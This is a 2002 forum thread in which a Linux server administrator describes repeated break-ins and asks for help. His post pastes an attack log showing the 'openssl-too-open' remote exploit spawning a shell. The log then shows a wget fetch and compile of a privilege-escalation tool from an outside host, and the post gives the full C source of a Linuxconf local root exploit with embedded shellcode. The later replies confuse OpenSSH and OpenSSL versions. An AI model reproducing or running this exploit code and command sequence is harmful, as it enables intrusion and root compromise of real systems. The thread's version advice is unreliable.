Guest tcreek Posted December 10, 2002 Report Share Posted December 10, 2002 I have Mandrake V8 installed for my server. For the past 3 weeks and 3 times intruders have beeing getting into my system and getting priveledge access and setting up accounts. I finally found out how they are doing it after one the "script kiddies" made a mistake and left a binary file used to exploit my system. Using a hex editor i was able to find more information on this exploit. Looking at the code it is obvious affects the linuxconf file. looking at linuxconf date shows that is was accessed 3 days befor the intruder, but looking at the services panel...many services were stopped and selected to not run on system boot. One of the services was the syslog. As a note my systems logs were missing the times the intruder was in the system. Apparently they have been getting in using a exploit in SSHD. As I found on a hacker board. It however, does not include all of what it done to get initial access into the system. pistone@Holmes openssl-too-open]$ ./openssl -a 0x13 -v 201.25.144.xx : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host : Using the OpenSSL info leak to retrieve the addresses -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl0 : 0x8132108 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl1 : 0x8132108 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl2 : 0x8132108 : Sending shellcode -> send_client_hello -> get_server_hello ciphers: 0x8132108 start_addr: 0x8132048 SHELLCODE_OFS: 208 -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_error Execution of stage1 shellcode succeeded, sending stage2 Spawning shell... bash: no job control in this shell bash-2.04$ bash-2.04$ uname -a; id; w; Linux linux 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache) 4:57am up 88 days, 18:16, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty2 - 7Oct02 8days 0.76s 0.02s xinit /etc/X11/ root pts/0 - 7Oct02 8days 0.02s 0.02s /bin/cat bash-2.04$cd /tmp bash-2.04$wget http://packetstormsecurity.nl/0209-exploits/nslconf.c bash-2.04$gcc -o nslconf nslconf.c bash-2.04$./nslconf [ Linuxconf Local Xploit by RaiSe ] * Directory + file created .. [dont forget to delete it ] [* Looking at %esp .. ] [* Looking at: 0xbffff5f8 ] [* Shellcode found at: 0xbffff7a4 ] [* Xploting .. ] id uid=0(root) gid=48(apache) groups=48(apache) And here is the code that was ggc'd from the above quoted : /* * Linuxconf <= 1.28r3 local xploit * by RaiSe <raise@netsearch-ezine.com> * http://www.netsearch-ezine.com * * Tested on: * Mandrake 8.0 * Mandrake 8.2 * RedHat 7.3 * * (run without args on directory * with +w) */ #include <stdio.h> #include <stdlib.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <asm/user.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define PATHLCONF "/sbin/linuxconf" unsigned long get_shell(void); char shellcode[]= // by RaiSe "x90x90x90x90x90x90x90x90" "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc9x51xb8x38" "x65x73x68x66x35x56x4ax50xb8x65x65x62x69x66x35" "x4ax4ax50x89xe3x51x53x89xe1x31xd2x31xc0xb0x0b" "xcdx80"; int main(void) { FILE *fp; char buf[2056], buf2[2048]; unsigned long shell, *p; int i; printf("n[ Linuxconf Local Xploit by RaiSe ]nn"); fflush(stdout); sprintf(buf2, "%s.eng", shellcode); if (mkdir(buf2, S_IRWXU)) { fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, " "delete it and run again.nn"); exit(-1); } else sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode); if ((fp = fopen(buf2, "w")) == NULL) { fprintf(stderr, "* Error at creat file, +w?nn"); exit(-1); } else fclose(fp); printf("* Directory + file created ..n"); printf(" [dont forget to delete it;)]n"); fflush(stdout); bzero(buf, sizeof(buf)); shell = get_shell(); p = (unsigned long *) buf; for (i = 0; i < 2048; i+=4) *p++ = shell; setenv("SCODE", shellcode, 1); setenv("LINUXCONF_LANG",buf,1); execl(PATHLCONF, "linuxconf", NULL); exit(-1); } /******* end of main() ******/ unsigned long get_shell(void) { unsigned long sc; struct user_regs_struct regs; int pid_vuln, n; /* creamos un proceso */ if (!(pid_vuln = fork())) { char buf[2056]; sleep(2); bzero(buf, sizeof(buf)); memset(buf, 0x41, 2048); setenv("SCODE", shellcode, 1); setenv("LINUXCONF_LANG",buf, 1); execl(PATHLCONF, "linuxconf", NULL); fprintf(stderr, "Error: execl.n"); exit(-1); } else { if (ptrace(PTRACE_ATTACH, pid_vuln)) { fprintf(stderr, "Error: PTRACE_ATTACH.n"); exit(-1); } waitpid(pid_vuln, NULL, 0); printf("n[* Looking at %%esp .. ]n"); fflush(stdout); if (ptrace(PTRACE_CONT, pid_vuln, 0, 0)) { fprintf(stderr, "Error: PTRACE_CONT.n"); exit(-1); } waitpid(pid_vuln, NULL, 0); if (ptrace(PTRACE_GETREGS, pid_vuln, 0, ®s)) { fprintf(stderr, "Error: PTRACE_GETREGS.n"); exit(-1); } printf("[* Looking at: 0x%08x ]n", (int) regs.esp); fflush(stdout); n = 0, sc = 0; do { if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln, (int)(regs.esp+(n++)), 0)) == -1) { fprintf(stderr, "Error: PTRACE_PEEKTEXT.n"); exit(-1); } } while (sc != 0x90909090); n--; printf("[* Shellcode found at: 0x%08x ]n", (int)(regs.esp + n)); fflush(stdout); if(ptrace(PTRACE_KILL, pid_vuln, 0, 0)) { fprintf(stderr, "Error: PTRACE_KILL.n"); exit(-1); } else { waitpid(pid_vuln, NULL, 0); printf("[* Xploting .. ]nn"); fflush(stdout); sleep(1); return((unsigned long)(regs.esp + n)); } } } /********* enf of get_shell() **********/ /* EOF */ I ended up in having to shutdown my SSH server. I really need to be able to log into my system remotly as well as others. Is there an updated SSHD to upgrade to, or another to use?? Thank you. Trent Quote Link to comment Share on other sites More sharing options...
Guest arise Posted December 10, 2002 Report Share Posted December 10, 2002 This could be a very serious issue, if it's not an already known exploit! Surprising how many people actually bothered to reply to your message until now :( What exact version of SSH are you running? Try to patch it, or better, dump it and try OpenSSH insted. Please let me know how the matter develops... Quote Link to comment Share on other sites More sharing options...
Guest tcreek Posted December 11, 2002 Report Share Posted December 11, 2002 If you notice the Second line of the "quoted" text above... OpenSSL remote exploit . I was using openssh server version 2.5.2p2-3mdk. Trent Quote Link to comment Share on other sites More sharing options...
Guest tcreek Posted December 11, 2002 Report Share Posted December 11, 2002 I did find this Security Advisory: http://www.openssh.com/txt/preauth.adv Quote Link to comment Share on other sites More sharing options...
Ronin Posted December 11, 2002 Report Share Posted December 11, 2002 If you notice the Second line of the "quoted" text above... OpenSSL remote exploit .I was using openssh server version 2.5.2p2-3mdk Trent Hasn't that been fixed in a version or 2 ago though? Quote Link to comment Share on other sites More sharing options...
Guest tcreek Posted December 11, 2002 Report Share Posted December 11, 2002 Actaully no..According to the OPEN SLL Org site you have to upgrade all the way up to version 3.4. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.